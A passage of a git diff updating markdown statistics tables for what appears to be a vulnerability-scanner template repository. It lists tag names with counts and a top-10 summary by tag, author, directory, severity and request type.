-| rabbitmq | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| frontpage | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| s3 | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| zms | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| pmb | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| woocommerce | 1 | | | | | | | | | -| rockethchat | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| sql | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| panasonic | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| terraform | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| rocketchat | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| pihole | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| gitea | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| openvpn | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| ecoa | 1 | | | | | | | | | | redis | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | | mdb | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | | postmessage | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| tidb | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | | lansweeper | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| vcenter | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | | mailchimp | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 079531ae29..7986a5f646 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | -| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | -| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | -| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | -| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | +| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 | +| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 | +| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 | +| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 | +| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | | +| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 199 | gy741 | 75 | takeovers | 64 | | | | | +| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | | +| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 155 | madrobot | 61 | workflows | 37 | | | | | From 